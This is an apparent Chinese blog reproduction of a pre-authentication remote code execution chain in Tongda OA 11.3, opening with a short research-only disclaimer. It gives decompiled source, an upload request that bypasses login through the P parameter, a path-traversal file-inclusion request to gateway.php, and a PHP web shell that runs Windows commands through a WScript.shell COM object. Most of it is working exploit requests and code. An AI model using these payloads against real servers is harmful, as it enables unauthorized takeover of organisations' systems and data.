通达oa 11.3 前台RCE

参考这篇:https://mp.weixin.qq.com/s/EjPmA9TaLWG0-HR-fE87hw

注:仅用于漏洞测试与研究,请勿用于非法用途

首先在官网下载安装,发现这代码都是加密过的,根据加密后的代码的特征,可以知道这是用Zend加密的,找个在线网站去解密就好了

http://dezend.qiling.org/free.html

然后得到ispirit/im/upload.php的源码,关键内容如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
//decode by http://dezend.qiling.org QQ 2859470

set_time_limit(0);
$P = $_POST['P'];
if (isset($P) || $P != '') {
ob_start();
include_once 'inc/session.php';
session_id($P);
session_start();
session_write_close();
} else {
include_once './auth.php';
}
...
$TYPE = $_POST['TYPE'];
$DEST_UID = $_POST['DEST_UID'];
$dataBack = array();
if ($DEST_UID != '' && !td_verify_ids($ids)) {
$dataBack = array('status' => 0, 'content' => '-ERR ' . _('接收方ID无效'));
echo json_encode(data2utf8($dataBack));
exit;
}
if (strpos($DEST_UID, ',') !== false) {
} else {
$DEST_UID = intval($DEST_UID);
}
if ($DEST_UID == 0) {
if ($UPLOAD_MODE != 2) {
$dataBack = array('status' => 0, 'content' => '-ERR ' . _('接收方ID无效'));
echo json_encode(data2utf8($dataBack));
exit;
}
}
...
}

可以看到传入P参数就可以绕过登录了,再按照逻辑去添加参数就可以前台文件上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /ispirit/im/upload.php HTTP/1.1
Content-Type: multipart/form-data; boundary=--------1671563870

----------1671563870
Content-Disposition: form-data; name="ATTACHMENT"; filename="a.txt"
Content-Type: text/plain

<?php echo "pwn!";?>
----------1671563870
Content-Disposition: form-data; name="P"

admin
----------1671563870
Content-Disposition: form-data; name="DEST_UID"

0
----------1671563870
Content-Disposition: form-data; name="UPLOAD_MODE"

2
----------1671563870--

会回显到文件的路径,这个很舒服

image-20200318161209404

很可惜,不能传shell,而且会保存在非web路径,根本无法访问,接下来就是文件包含

文件包含点在ispirit/interface/gateway.php,解密后的关键代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php
//decode by http://dezend.qiling.org QQ 2859470

ob_start();
include_once 'inc/session.php';
include_once 'inc/conn.php';
include_once 'inc/utility_org.php';
if ($P != '') {
if (preg_match('/[^a-z0-9;]+/i', $P)) {
echo _('非法参数');
exit;
}
session_id($P);
session_start();
session_write_close();
if ($_SESSION['LOGIN_USER_ID'] == '' || $_SESSION['LOGIN_UID'] == '') {
echo _('RELOGIN');
exit;
}
}
if ($json) {
$json = stripcslashes($json);
$json = (array) json_decode($json);
foreach ($json as $key => $val) {
if ($key == 'data') {
$val = (array) $val;
foreach ($val as $keys => $value) {
${$keys} = $value;
}
}
if ($key == 'url') {
$url = $val;
}
}
if ($url != '') {
if (substr($url, 0, 1) == '/') {
$url = substr($url, 1);
}
if (strpos($url, 'general/') !== false || strpos($url, 'ispirit/') !== false || strpos($url, 'module/') !== false) {
include_once $url;
}
}
exit;
}

这里不传入P参数就可以绕过了,很简单

1
2
3
POST /ispirit/interface/gateway.php HTTP/1.1

json={"url":"ispirit/im/../../../../../chaitin/tdoa/attach/im/2003/1840350693.a.txt"}

直接找路径去文件包含就好了

image-20200318161552738

还有最后一步绕过disable_function,在windows下可以通过加载com组件来绕过

1
2
3
4
5
6
7
8
<?php
$command=$_GET['a'];
$wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能
$exec = $wsh->exec("cmd /c ".$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

把上传的内容改成这个就好了,可以看到已经成功RCE

image-20200318161912755

总之这个洞复现很简单,靠加密来防护的都是屑

0%